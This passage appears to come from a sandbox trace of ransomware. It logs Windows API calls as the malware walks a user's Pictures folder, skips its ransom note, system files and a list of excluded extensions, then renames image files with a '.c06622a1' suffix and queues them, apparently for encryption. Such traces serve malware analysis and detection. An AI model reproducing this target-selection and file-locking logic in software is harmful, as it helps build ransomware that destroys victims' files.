(_Str1="BK-cTblnCTtdx.gif", _Str2="README.c06622a1.TXT") returned -16 [0155.900] wcsstr (_Str="BK-cTblnCTtdx.gif", _SubStr="README") returned 0x0 [0155.900] _wcsicmp (_Str1="autorun.inf", _Str2="BK-cTblnCTtdx.gif") returned -1 [0155.900] wcslen (_String="autorun.inf") returned 0xb [0155.900] _wcsicmp (_Str1="boot.ini", _Str2="BK-cTblnCTtdx.gif") returned 4 [0155.900] wcslen (_String="boot.ini") returned 0x8 [0155.900] _wcsicmp (_Str1="bootfont.bin", _Str2="BK-cTblnCTtdx.gif") returned 4 [0155.900] wcslen (_String="bootfont.bin") returned 0xc [0155.900] _wcsicmp (_Str1="bootsect.bak", _Str2="BK-cTblnCTtdx.gif") returned 4 [0155.900] wcslen (_String="bootsect.bak") returned 0xc [0155.900] _wcsicmp (_Str1="desktop.ini", _Str2="BK-cTblnCTtdx.gif") returned 2 [0155.900] wcslen (_String="desktop.ini") returned 0xb [0155.900] _wcsicmp (_Str1="iconcache.db", _Str2="BK-cTblnCTtdx.gif") returned 7 [0155.900] wcslen (_String="iconcache.db") returned 0xc [0155.900] _wcsicmp (_Str1="ntldr", _Str2="BK-cTblnCTtdx.gif") returned 12 [0155.900] wcslen (_String="ntldr") returned 0x5 [0155.900] _wcsicmp (_Str1="ntuser.dat", _Str2="BK-cTblnCTtdx.gif") returned 12 [0155.900] wcslen (_String="ntuser.dat") returned 0xa [0155.900] _wcsicmp (_Str1="ntuser.dat.log", _Str2="BK-cTblnCTtdx.gif") returned 12 [0155.901] wcslen (_String="ntuser.dat.log") returned 0xe [0155.901] _wcsicmp (_Str1="ntuser.ini", _Str2="BK-cTblnCTtdx.gif") returned 12 [0155.901] wcslen (_String="ntuser.ini") returned 0xa [0155.901] _wcsicmp (_Str1="thumbs.db", _Str2="BK-cTblnCTtdx.gif") returned 18 [0155.901] wcslen (_String="thumbs.db") returned 0x9 [0155.901] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0155.901] wcslen (_String="386") returned 0x3 [0155.901] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0155.901] wcslen (_String="adv") returned 0x3 [0155.901] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0155.901] wcslen (_String="ani") returned 0x3 [0155.901] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0155.901] wcslen (_String="bat") returned 0x3 [0155.901] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0155.901] wcslen (_String="bin") returned 0x3 [0155.901] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0155.901] wcslen (_String="cab") returned 0x3 [0155.901] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0155.901] wcslen (_String="cmd") returned 0x3 [0155.901] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0155.901] wcslen (_String="com") returned 0x3 [0155.901] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0155.901] wcslen (_String="cpl") returned 0x3 [0155.901] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0155.901] wcslen (_String="cur") returned 0x3 [0155.901] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0155.901] wcslen (_String="deskthemepack") returned 0xd [0155.901] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0155.901] wcslen (_String="diagcab") returned 0x7 [0155.901] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0155.901] wcslen (_String="diagcfg") returned 0x7 [0155.902] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0155.902] wcslen (_String="diagpkg") returned 0x7 [0155.902] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0155.902] wcslen (_String="dll") returned 0x3 [0155.902] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0155.902] wcslen (_String="drv") returned 0x3 [0155.902] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0155.902] wcslen (_String="exe") returned 0x3 [0155.902] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0155.902] wcslen (_String="hlp") returned 0x3 [0155.902] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0155.902] wcslen (_String="icl") returned 0x3 [0155.902] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0155.902] wcslen (_String="icns") returned 0x4 [0155.902] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0155.902] wcslen (_String="ico") returned 0x3 [0155.902] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0155.902] wcslen (_String="ics") returned 0x3 [0155.902] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0155.902] wcslen (_String="idx") returned 0x3 [0155.902] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0155.902] wcslen (_String="ldf") returned 0x3 [0155.902] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0155.902] wcslen (_String="lnk") returned 0x3 [0155.902] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0155.902] wcslen (_String="mod") returned 0x3 [0155.902] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0155.902] wcslen (_String="mpa") returned 0x3 [0155.902] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0155.902] wcslen (_String="msc") returned 0x3 [0155.902] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0155.902] wcslen (_String="msp") returned 0x3 [0155.903] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0155.903] wcslen (_String="msstyles") returned 0x8 [0155.903] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0155.903] wcslen (_String="msu") returned 0x3 [0155.903] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0155.903] wcslen (_String="nls") returned 0x3 [0155.903] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0155.903] wcslen (_String="nomedia") returned 0x7 [0155.903] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0155.903] wcslen (_String="ocx") returned 0x3 [0155.903] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0155.903] wcslen (_String="prf") returned 0x3 [0155.903] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0155.903] wcslen (_String="ps1") returned 0x3 [0155.903] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0155.903] wcslen (_String="rom") returned 0x3 [0155.903] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0155.903] wcslen (_String="rtp") returned 0x3 [0155.903] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0155.903] wcslen (_String="scr") returned 0x3 [0155.903] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0155.903] wcslen (_String="shs") returned 0x3 [0155.903] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0155.903] wcslen (_String="spl") returned 0x3 [0155.903] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0155.903] wcslen (_String="sys") returned 0x3 [0155.903] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0155.903] wcslen (_String="theme") returned 0x5 [0155.903] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0155.903] wcslen (_String="themepack") returned 0x9 [0155.903] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0155.903] wcslen (_String="wpx") returned 0x3 [0155.904] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0155.904] wcslen (_String="lock") returned 0x4 [0155.904] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0155.904] wcslen (_String="key") returned 0x3 [0155.904] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0155.904] wcslen (_String="hta") returned 0x3 [0155.904] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0155.904] wcslen (_String="msi") returned 0x3 [0155.904] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0155.904] wcslen (_String="pdb") returned 0x3 [0155.904] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0155.904] wcslen (_String="sql") returned 0x3 [0155.904] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0155.904] wcslen (_String="sqlite") returned 0x6 [0155.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.904] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0155.904] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.904] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0155.904] wcscpy (in: _Dest=0x4560156, _Source="BK-cTblnCTtdx.gif" | out: _Dest="BK-cTblnCTtdx.gif") returned="BK-cTblnCTtdx.gif" [0155.904] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif", dwFileAttributes=0x80) returned 1 [0155.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\bk-ctblncttdx.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0155.905] SetFilePointerEx (in: hFile=0x638, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.905] ReadFile (in: hFile=0x638, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0155.906] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0xbadd58e4 [0155.906] RtlComputeCrc32 (PartialCrc=0x58e4, Buffer=0x3fe3f4, Length=0x80) returned 0x76506710 [0155.906] RtlComputeCrc32 (PartialCrc=0x6710, Buffer=0x3fe3f4, Length=0x80) returned 0x342cc993 [0155.906] RtlComputeCrc32 (PartialCrc=0xc993, Buffer=0x3fe3f4, Length=0x80) returned 0x3deba88a [0155.906] RtlComputeCrc32 (PartialCrc=0xa88a, Buffer=0x3fe3f4, Length=0x80) returned 0x3afab9b1 [0155.906] CloseHandle (hObject=0x638) returned 1 [0155.906] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0155.906] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif" [0155.906] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif") returned 0x5c [0155.906] wcscpy (in: _Dest=0x4570180, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.906] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\bk-ctblncttdx.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\bk-ctblncttdx.gif.c06622a1"), dwFlags=0x8) returned 1 [0155.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\BK-cTblnCTtdx.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\bk-ctblncttdx.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x638 [0155.909] CreateIoCompletionPort (FileHandle=0x638, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.909] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4c10020 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9827db7 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e1f3b3 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x16a1d14f [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x16743f00 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71a52f09 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfd73b36 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x70e5d207 [0155.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ce8d8a6 [0155.918] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4c10094, Length=0x80) returned 0x43d6164c [0155.918] RtlComputeCrc32 (PartialCrc=0x164c, Buffer=0x4c10094, Length=0x80) returned 0xb4244904 [0155.918] RtlComputeCrc32 (PartialCrc=0x4904, Buffer=0x4c10094, Length=0x80) returned 0xb0016fe3 [0155.918] RtlComputeCrc32 (PartialCrc=0x6fe3, Buffer=0x4c10094, Length=0x80) returned 0x910a0d03 [0155.918] RtlComputeCrc32 (PartialCrc=0xd03, Buffer=0x4c10094, Length=0x80) returned 0x24a7c948 [0155.918] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0155.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0155.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0155.918] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9163c580, ftCreationTime.dwHighDateTime=0x1d5e053, ftLastAccessTime.dwLowDateTime=0x174b7de0, ftLastAccessTime.dwHighDateTime=0x1d5dee8, ftLastWriteTime.dwLowDateTime=0x174b7de0, ftLastWriteTime.dwHighDateTime=0x1d5dee8, nFileSizeHigh=0x0, nFileSizeLow=0x9685, dwReserved0=0x0, dwReserved1=0x0, cFileName="hElEG0AIJDp_.gif", cAlternateFileName="HELEG0~1.GIF")) returned 1 [0155.918] _wcsicmp (_Str1="hElEG0AIJDp_.gif", _Str2="README.c06622a1.TXT") returned -10 [0155.918] wcsstr (_Str="hElEG0AIJDp_.gif", _SubStr="README") returned 0x0 [0155.918] _wcsicmp (_Str1="autorun.inf", _Str2="hElEG0AIJDp_.gif") returned -7 [0155.918] wcslen (_String="autorun.inf") returned 0xb [0155.919] _wcsicmp (_Str1="boot.ini", _Str2="hElEG0AIJDp_.gif") returned -6 [0155.919] wcslen (_String="boot.ini") returned 0x8 [0155.919] _wcsicmp (_Str1="bootfont.bin", _Str2="hElEG0AIJDp_.gif") returned -6 [0155.919] wcslen (_String="bootfont.bin") returned 0xc [0155.919] _wcsicmp (_Str1="bootsect.bak", _Str2="hElEG0AIJDp_.gif") returned -6 [0155.919] wcslen (_String="bootsect.bak") returned 0xc [0155.919] _wcsicmp (_Str1="desktop.ini", _Str2="hElEG0AIJDp_.gif") returned -4 [0155.919] wcslen (_String="desktop.ini") returned 0xb [0155.919] _wcsicmp (_Str1="iconcache.db", _Str2="hElEG0AIJDp_.gif") returned 1 [0155.919] wcslen (_String="iconcache.db") returned 0xc [0155.919] _wcsicmp (_Str1="ntldr", _Str2="hElEG0AIJDp_.gif") returned 6 [0155.919] wcslen (_String="ntldr") returned 0x5 [0155.919] _wcsicmp (_Str1="ntuser.dat", _Str2="hElEG0AIJDp_.gif") returned 6 [0155.919] wcslen (_String="ntuser.dat") returned 0xa [0155.919] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hElEG0AIJDp_.gif") returned 6 [0155.919] wcslen (_String="ntuser.dat.log") returned 0xe [0155.919] _wcsicmp (_Str1="ntuser.ini", _Str2="hElEG0AIJDp_.gif") returned 6 [0155.919] wcslen (_String="ntuser.ini") returned 0xa [0155.919] _wcsicmp (_Str1="thumbs.db", _Str2="hElEG0AIJDp_.gif") returned 12 [0155.919] wcslen (_String="thumbs.db") returned 0x9 [0155.919] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0155.919] wcslen (_String="386") returned 0x3 [0155.919] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0155.919] wcslen (_String="adv") returned 0x3 [0155.919] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0155.919] wcslen (_String="ani") returned 0x3 [0155.919] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0155.919] wcslen (_String="bat") returned 0x3 [0155.919] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0155.919] wcslen (_String="bin") returned 0x3 [0155.919] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0155.919] wcslen (_String="cab") returned 0x3 [0155.920] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0155.920] wcslen (_String="cmd") returned 0x3 [0155.920] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0155.920] wcslen (_String="com") returned 0x3 [0155.920] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0155.920] wcslen (_String="cpl") returned 0x3 [0155.920] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0155.920] wcslen (_String="cur") returned 0x3 [0155.920] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0155.920] wcslen (_String="deskthemepack") returned 0xd [0155.920] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0155.920] wcslen (_String="diagcab") returned 0x7 [0155.920] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0155.920] wcslen (_String="diagcfg") returned 0x7 [0155.920] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0155.920] wcslen (_String="diagpkg") returned 0x7 [0155.920] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0155.920] wcslen (_String="dll") returned 0x3 [0155.920] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0155.920] wcslen (_String="drv") returned 0x3 [0155.920] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0155.920] wcslen (_String="exe") returned 0x3 [0155.920] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0155.920] wcslen (_String="hlp") returned 0x3 [0155.920] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0155.920] wcslen (_String="icl") returned 0x3 [0155.920] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0155.920] wcslen (_String="icns") returned 0x4 [0155.920] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0155.920] wcslen (_String="ico") returned 0x3 [0155.920] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0155.921] wcslen (_String="ics") returned 0x3 [0155.921] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0155.921] wcslen (_String="idx") returned 0x3 [0155.921] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0155.921] wcslen (_String="ldf") returned 0x3 [0155.921] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0155.921] wcslen (_String="lnk") returned 0x3 [0155.921] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0155.921] wcslen (_String="mod") returned 0x3 [0155.921] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0155.921] wcslen (_String="mpa") returned 0x3 [0155.921] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0155.921] wcslen (_String="msc") returned 0x3 [0155.921] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0155.921] wcslen (_String="msp") returned 0x3 [0155.921] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0155.921] wcslen (_String="msstyles") returned 0x8 [0155.921] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0155.921] wcslen (_String="msu") returned 0x3 [0155.921] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0155.921] wcslen (_String="nls") returned 0x3 [0155.921] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0155.921] wcslen (_String="nomedia") returned 0x7 [0155.921] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0155.921] wcslen (_String="ocx") returned 0x3 [0155.921] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0155.921] wcslen (_String="prf") returned 0x3 [0155.921] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0155.921] wcslen (_String="ps1") returned 0x3 [0155.921] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0155.921] wcslen (_String="rom") returned 0x3 [0155.922] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0155.922] wcslen (_String="rtp") returned 0x3 [0155.922] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0155.922] wcslen (_String="scr") returned 0x3 [0155.922] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0155.922] wcslen (_String="shs") returned 0x3 [0155.922] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0155.922] wcslen (_String="spl") returned 0x3 [0155.922] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0155.922] wcslen (_String="sys") returned 0x3 [0155.922] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0155.922] wcslen (_String="theme") returned 0x5 [0155.922] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0155.922] wcslen (_String="themepack") returned 0x9 [0155.922] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0155.922] wcslen (_String="wpx") returned 0x3 [0155.922] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0155.922] wcslen (_String="lock") returned 0x4 [0155.922] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0155.922] wcslen (_String="key") returned 0x3 [0155.922] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0155.922] wcslen (_String="hta") returned 0x3 [0155.922] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0155.922] wcslen (_String="msi") returned 0x3 [0155.922] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0155.922] wcslen (_String="pdb") returned 0x3 [0155.922] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0155.922] wcslen (_String="sql") returned 0x3 [0155.922] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0155.922] wcslen (_String="sqlite") returned 0x6 [0155.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.923] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0155.923] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.923] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0155.923] wcscpy (in: _Dest=0x4560156, _Source="hElEG0AIJDp_.gif" | out: _Dest="hElEG0AIJDp_.gif") returned="hElEG0AIJDp_.gif" [0155.923] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif", dwFileAttributes=0x80) returned 1 [0155.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\heleg0aijdp_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0155.923] SetFilePointerEx (in: hFile=0x668, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.923] ReadFile (in: hFile=0x668, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0155.924] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x816966a7 [0155.924] RtlComputeCrc32 (PartialCrc=0x66a7, Buffer=0x3fe3f4, Length=0x80) returned 0xd7d17d1 [0155.924] RtlComputeCrc32 (PartialCrc=0x17d1, Buffer=0x3fe3f4, Length=0x80) returned 0xbc84f3bf [0155.924] RtlComputeCrc32 (PartialCrc=0xf3bf, Buffer=0x3fe3f4, Length=0x80) returned 0x803f8cd [0155.924] RtlComputeCrc32 (PartialCrc=0xf8cd, Buffer=0x3fe3f4, Length=0x80) returned 0xfccd275f [0155.924] CloseHandle (hObject=0x668) returned 1 [0155.924] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0155.924] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif" [0155.924] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif") returned 0x5b [0155.924] wcscpy (in: _Dest=0x457017e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.924] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\heleg0aijdp_.gif"), 